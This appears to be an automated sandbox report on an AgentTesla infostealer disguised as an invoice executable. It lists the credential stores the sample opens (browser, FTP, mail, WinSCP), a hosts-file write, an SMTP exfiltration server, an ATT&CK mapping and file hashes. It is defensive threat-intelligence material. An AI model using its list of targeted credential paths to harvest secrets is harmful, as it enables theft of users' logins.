                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe | Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe | Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe | Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe | Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe | Queries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe | Queries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe | Queries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe | Queries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe | Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe | Queries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe | Queries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Data.Entity\v4.0_4.0.0.0__b77a5c561934e089\System.Data.Entity.dll VolumeInformation
Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe | Queries volume information: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe VolumeInformation
Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Lowering of HIPS / PFW / Operating System Security Settings:

Modifies the hosts file
Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe | File written: C:\Windows\System32\drivers\etc\hosts

Stealing of Sensitive Information:

Yara detected AgentTesla
Source: Yara match | File source: 7.2.INVOICE & TELEX BL_PDF.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.INVOICE & TELEX BL_PDF.exe.37c7e90.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.INVOICE & TELEX BL_PDF.exe.36986b0.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.INVOICE & TELEX BL_PDF.exe.36986b0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000001.00000002.315990604.00000000035C1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.554063789.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.557227269.0000000003071000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: INVOICE & TELEX BL_PDF.exe PID: 6708, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: INVOICE & TELEX BL_PDF.exe PID: 5728, type: MEMORYSTR

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions

Tries to harvest and steal ftp login credentials
Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe | File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\
Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe | File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml

Tries to steal Mail credentials (via file access)
Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities

Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: Yara match | File source: 00000007.00000002.557227269.0000000003071000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: INVOICE & TELEX BL_PDF.exe PID: 5728, type: MEMORYSTR

Remote Access Functionality:

Yara detected AgentTesla
Source: Yara match | File source: 7.2.INVOICE & TELEX BL_PDF.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.INVOICE & TELEX BL_PDF.exe.37c7e90.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.INVOICE & TELEX BL_PDF.exe.36986b0.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.INVOICE & TELEX BL_PDF.exe.36986b0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000001.00000002.315990604.00000000035C1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.554063789.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.557227269.0000000003071000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: INVOICE & TELEX BL_PDF.exe PID: 6708, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: INVOICE & TELEX BL_PDF.exe PID: 5728, type: MEMORYSTR

MITRE ATT&CK Matrix

(Digits after a technique name are the report's signature-count badges for that cell; empty cells are left blank.)

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts | Windows Management Instrumentation 311 | Path Interception | Process Injection 12 | Masquerading 1 | OS Credential Dumping 2 | Security Software Discovery 321 | Remote Services | Email Collection 1 | Exfiltration Over Other Network Medium | Encrypted Channel 1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | File and Directory Permissions Modification 1 | Credentials in Registry 1 | Process Discovery 2 | Remote Desktop Protocol | Archive Collected Data 1 | Exfiltration Over Bluetooth | Non-Standard Port 1 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Disable or Modify Tools 11 | Security Account Manager | Virtualization/Sandbox Evasion 241 | SMB/Windows Admin Shares | Data from Local System 2 | Automated Exfiltration | Non-Application Layer Protocol 1 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Virtualization/Sandbox Evasion 241 | NTDS | Application Window Discovery 1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol 11 | SIM Card Swap | | Carrier Billing Fraud
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Process Injection 12 | LSA Secrets | Remote System Discovery 1 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
Replication Through Removable Media | Launchd | Rc.common | Rc.common | Obfuscated Files or Information 2 | Cached Domain Credentials | File and Directory Discovery 1 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
External Remote Services | Scheduled Task | Startup Items | Startup Items | Software Packing 12 | DCSync | System Information Discovery 114 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact

                      Behavior Graph

(Interactive behavior graph not reproduced.)

                      Screenshots


                      Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source | Detection | Scanner | Label
INVOICE & TELEX BL_PDF.exe | 38% | Virustotal |
INVOICE & TELEX BL_PDF.exe | 33% | ReversingLabs | ByteCode-MSIL.Trojan.AgentTesla

Dropped Files

No Antivirus matches

Unpacked PE Files

Source | Detection | Scanner | Label
7.2.INVOICE & TELEX BL_PDF.exe.400000.0.unpack | 100% | Avira | TR/Spy.Gen8

Domains

Source | Detection | Scanner | Label
smtp.zfftcn.com | 0% | Virustotal |

                      URLs

(URL reputation table omitted: a list of URL indicators extracted from memory, each rated 0% by Avira URL Cloud or URL Reputation.)

                      Domains and IPs

                      Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
us2.smtp.mailhostbox.com | 208.91.199.225 | true | false | | high
smtp.zfftcn.com | unknown | unknown | true | | unknown

                        URLs from Memory and Binaries

(Table omitted: a list of URL strings found in process memory dumps with their source dump identifiers, malicious flag and reputation.)
                                                high
                                                http://www.jiyu-kobo.co.jp/INVOICE & TELEX BL_PDF.exe, 00000001.00000003.293939695.000000000565D000.00000004.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                unknown
                                                http://www.fontbureau.com/designers8INVOICE & TELEX BL_PDF.exe, 00000001.00000002.319193447.0000000006862000.00000004.00000001.sdmpfalse
                                                  high
                                                  http://www.fontbureau.comceINVOICE & TELEX BL_PDF.exe, 00000001.00000003.300428403.0000000005657000.00000004.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  unknown
                                                  http://www.fontbureau.comalsINVOICE & TELEX BL_PDF.exe, 00000001.00000003.297973029.000000000565C000.00000004.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  unknown
                                                  http://www.fontbureau.comxINVOICE & TELEX BL_PDF.exe, 00000001.00000003.296524959.000000000565C000.00000004.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  unknown
                                                  http://www.jiyu-kobo.co.jp/obyINVOICE & TELEX BL_PDF.exe, 00000001.00000003.292953266.000000000565B000.00000004.00000001.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown

                                                  Contacted IPs


                                                  Public

IP: 208.91.199.225
Domain: us2.smtp.mailhostbox.com
Country: United States
ASN: 394695
ASN Name: PUBLIC-DOMAIN-REGISTRY (US)
Malicious: false

                                                  General Information

                                                  Joe Sandbox Version:33.0.0 White Diamond
                                                  Analysis ID:491534
                                                  Start date:27.09.2021
                                                  Start time:17:18:23
                                                  Joe Sandbox Product:CloudBasic
                                                  Overall analysis duration:0h 10m 31s
                                                  Hypervisor based Inspection enabled:false
                                                  Report type:full
                                                  Sample file name:INVOICE & TELEX BL_PDF.exe
                                                  Cookbook file name:default.jbs
                                                  Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed:23
                                                  Number of new started drivers analysed:0
                                                  Number of existing processes analysed:0
                                                  Number of existing drivers analysed:0
                                                  Number of injected processes analysed:0
                                                  Technologies:
                                                  • HCA enabled
                                                  • EGA enabled
                                                  • HDC enabled
                                                  • AMSI enabled
                                                  Analysis Mode:default
                                                  Analysis stop reason:Timeout
                                                  Detection:MAL
                                                  Classification:mal100.troj.adwa.spyw.evad.winEXE@8/6@2/1
                                                  EGA Information:Failed
                                                  HDC Information:
                                                  • Successful, ratio: 1.2% (good quality ratio 1.1%)
                                                  • Quality average: 59.5%
                                                  • Quality standard deviation: 32.6%
                                                  HCA Information:
                                                  • Successful, ratio: 99%
                                                  • Number of executed functions: 29
                                                  • Number of non-executed functions: 3
                                                  Cookbook Comments:
                                                  • Adjust boot time
                                                  • Enable AMSI
                                                  • Found application associated with file extension: .exe
                                                  Warnings:
                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
                                                  • Excluded IPs from analysis (whitelisted): 20.49.157.6, 20.54.110.249, 40.112.88.60, 23.0.174.200, 23.0.174.185, 20.199.120.151, 23.10.249.26, 23.10.249.43, 20.199.120.85, 20.82.209.183, 20.199.120.182
                                                  • Excluded domains from analysis (whitelisted): client.wns.windows.com, iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, wu-shim.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, ctldl.windowsupdate.com, a767.dspw65.akamai.net, a1449.dscg2.akamai.net, arc.msn.com, download.windowsupdate.com.edgesuite.net, ris.api.iris.microsoft.com, wns.notify.trafficmanager.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, iris-de-ppe-azsc-uks.uksouth.cloudapp.azure.com, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
• Not all processes were analyzed, report is missing behavior information
                                                  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                  • Report size getting too big, too many NtQueryValueKey calls found.

                                                  Simulations

                                                  Behavior and APIs

Time: 17:19:27
Type: API Interceptor
Description: 721x Sleep call for process: INVOICE & TELEX BL_PDF.exe modified

                                                  Joe Sandbox View / Context

                                                  IPs

Match: 208.91.199.225
Associated samples (all detected as malicious):
• SHIPPING DOCUMENTS_PDF.exe
• New Order.doc
• LFC _ X#U00e1c nh#U1eadn #U0111#U01a1n h#U00e0ng _ Kh#U1ea9n c#U1ea5p,pdf.exe
• #U0916#U0930#U0940#U0926 #U0906#U0926#U0947#U0936-34002174,pdf.exe
• #Uc7ac #Uc8fc#Ubb38 #Ud655#Uc778,pdf.exe
• KLC45E_92421_PI.exe
• MONO Nueva orden - E41140,PDF.exe
• SO230921.exe
• from-iso_PSC ___ - E41140,PDF.EXE
• Payment copy.exe
• COMTAC LISTA URGENTE ORDEN 92121,pdf.exe
• Payment Advice for order 19203-319203-4.exe
• Po#6672.pdf.exe
• 04142021_10RD0207S0N0000,pdf.exe
• Order Confirmation _ Urgent,pdf.exe
• New ORDER.doc
• RFQ_AP65425652_032421 segera.exe
• INTR_ORDER 5676-SEPT1521,pdf.exe
• Order pending.xlsx
• TOP URGENT.exe

                                                                                          Domains

Match: us2.smtp.mailhostbox.com
Associated samples (all detected as malicious), each with the IP recorded as context in that analysis:
• Inquiry - Specifications 002021.exe: 208.91.198.143
• #RFQ Medimpex International LLC.exe: 208.91.199.223
• SHIPPING DOCUMENTS_PDF.exe: 208.91.199.225
• New Order.doc: 208.91.198.143
• LFC _ X#U00e1c nh#U1eadn #U0111#U01a1n h#U00e0ng _ Kh#U1ea9n c#U1ea5p,pdf.exe: 208.91.199.223
• #U0916#U0930#U0940#U0926 #U0906#U0926#U0947#U0936-34002174,pdf.exe: 208.91.199.225
• #Uc7ac #Uc8fc#Ubb38 #Ud655#Uc778,pdf.exe: 208.91.199.225
• 4f7K9bfgNr.exe: 208.91.199.224
• Curriculum Vitae Milani.exe: 208.91.198.143
• Solicitud de cotizacion.exe: 208.91.198.143
• New Order.exe: 208.91.199.223
• KLC45E_92421_PI.exe: 208.91.199.223
• PO-3242.xlsx: 208.91.199.223
• MONO Nueva orden - E41140,PDF.exe: 208.91.199.223
• SO230921.exe: 208.91.199.223
• Products prices request.xlsx: 208.91.198.143
• 3qyhcUC9um.exe: 208.91.198.143
• Payment Advice 09-22-2021 SKMBT03783930484080484904003TXT.exe: 208.91.198.143
• from-iso_PSC ___ - E41140,PDF.EXE: 208.91.198.143
• n267kM6LhuZHjzz.exe: 208.91.198.143

                                                                                          ASN

Match: PUBLIC-DOMAIN-REGISTRY (US)
Associated samples (all detected as malicious), each with the IP recorded as context in that analysis:
• recital-239880844.xls: 204.11.59.34
• Inquiry - Specifications 002021.exe: 208.91.199.224
• waff.xls: 204.11.59.34
• #RFQ Medimpex International LLC.exe: 208.91.199.223
• SHIPPING DOCUMENTS_PDF.exe: 208.91.199.225
• New Order.doc: 208.91.199.225
• LFC _ X#U00e1c nh#U1eadn #U0111#U01a1n h#U00e0ng _ Kh#U1ea9n c#U1ea5p,pdf.exe: 208.91.199.224
• #U0916#U0930#U0940#U0926 #U0906#U0926#U0947#U0936-34002174,pdf.exe: 208.91.199.224
• #Uc7ac #Uc8fc#Ubb38 #Ud655#Uc778,pdf.exe: 208.91.199.224
• 4f7K9bfgNr.exe: 208.91.199.224
• Curriculum Vitae Milani.exe: 208.91.198.143
• Solicitud de cotizacion.exe: 208.91.198.143
• New Order.exe: 208.91.199.224
• KLC45E_92421_PI.exe: 208.91.199.224
• Request_For_Quotation#234242_signed_copy_document_september_rfq.exe: 162.215.240.160
• PO-3242.xlsx: 208.91.199.223
• MONO Nueva orden - E41140,PDF.exe: 208.91.199.224
• SO230921.exe: 208.91.199.224
• Products prices request.xlsx: 208.91.199.224
• Payment Advice 09-22-2021 SKMBT03783930484080484904003TXT.exe: 208.91.198.143

                                                                                          JA3 Fingerprints

                                                                                          No context

                                                                                          Dropped Files

                                                                                          No context

                                                                                          Created / dropped Files

                                                                                          C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\INVOICE & TELEX BL_PDF.exe.log
                                                                                          Process:C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe
                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):1401
                                                                                          Entropy (8bit):5.343588497030622
                                                                                          Encrypted:false
                                                                                          SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4x84aE4K1:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzh
                                                                                          MD5:3AD5DAA3F0DFACAC83B0F64B767AADBE
                                                                                          SHA1:03A3F4FF83FE2AFC2A50EF585EFE45B4D94EAAB1
                                                                                          SHA-256:1B877B320C76F556C1F5E51C2DF8A52316EA16F1B34D7FCA5C222BE500C5AD77
                                                                                          SHA-512:7EC991941E397C870633B525076F0EE09AEEF503B9701BE2D9C96CDA500B717BC71B2F6A266B6C26E0C220D9537621BD8986F98E90E8048CE8E9DAE819420122
                                                                                          Malicious:true
                                                                                          Reputation:low
                                                                                          Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21
                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):15708
                                                                                          Entropy (8bit):5.5307953202526265
                                                                                          Encrypted:false
                                                                                          SSDEEP:384:zt9gqsnVCzM07f4gSBKnj/ED9jTD1GEnWt:K4fJ4KoD97wEY
                                                                                          MD5:3114157E4EB16E173C55AE5B0CED1715
                                                                                          SHA1:B4F4755DDE6D34EE26013BE16F3CE32A4B3A83C0
                                                                                          SHA-256:3C76EE4243B062C4E21908DC2152D6CF3349252ECCE6A13B0CF270441014DC8D
                                                                                          SHA-512:9DEC72A7940BD31B5F31F69FA6E2E55F5BB1CD56B669BA8E192920B98D30FC5CC1244152C85ABC85ED1983F7AA818134052038B64A89C32E81DF3EF921C88922
                                                                                          Malicious:false
                                                                                          Reputation:low
                                                                                          Preview: @...e...........i.......h.8./.(...........J.....................H...............<@.^.L."My...:;..... .Microsoft.PowerShell.ConsoleHostD...............fZve...F.....x.)........System.Management.Automation4...............[...{a.C..%6..h.........System.Core.0...............G-.o...A...4B..........System..4................Zg5..:O..g..q..........System.Xml..L...............7.....J@......~.......#.Microsoft.Management.Infrastructure.8................'....L..}............System.Numerics.@................Lo...QN......<Q........System.DirectoryServices<................H..QN.Y.f............System.Management...4....................].D.E.....#.......System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<.................~.[L.D.Z.>..m.........System.Transactions.<................):gK..G...$.1.q........System.Configuration..............................................@.U.@.G.@.T.@..>@..)@..?@..o@..o@..o@..?@.V.@...@...@...@.V.@.H.@.X.@.[.@.NT@.HT@..S@..S@.hT@..S@.
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4jek5pvp.a5z.ps1
Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: very short file (no magic)
Category: dropped
Size (bytes): 1
Entropy (8bit): 0.0
Encrypted: false
SSDEEP: 3:U:U
MD5: C4CA4238A0B923820DCC509A6F75849B
SHA1: 356A192B7913B04C54574D18C28D46E6395428AB
SHA-256: 6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512: 4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious: false
Reputation: high, very likely benign file
Preview: 1
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vegpwjxm.c1e.psm1
Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: very short file (no magic)
Category: dropped
Size (bytes): 1
Entropy (8bit): 0.0
Encrypted: false
SSDEEP: 3:U:U
MD5: C4CA4238A0B923820DCC509A6F75849B
SHA1: 356A192B7913B04C54574D18C28D46E6395428AB
SHA-256: 6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512: 4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious: false
Preview: 1
C:\Users\user\Documents\20210927\PowerShell_transcript.760639.5QIvx0iZ.20210927171929.txt
Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: UTF-8 Unicode (with BOM) text, with CRLF, LF line terminators
Category: dropped
Size (bytes): 1885
Entropy (8bit): 5.169671927681671
Encrypted: false
SSDEEP: 48:BZevvh7oO+ShpqDYB1Z8FzNcJoZjeDKcJoZjPU1pAcIZZRi:BZenh7NBqDo1Z8gVpyU16cIZPi
MD5: 6E8871B96093317292C775BF4ECF3BFC
SHA1: C88766CFF3C042AA7D3D1FA59A780668EA2C358E
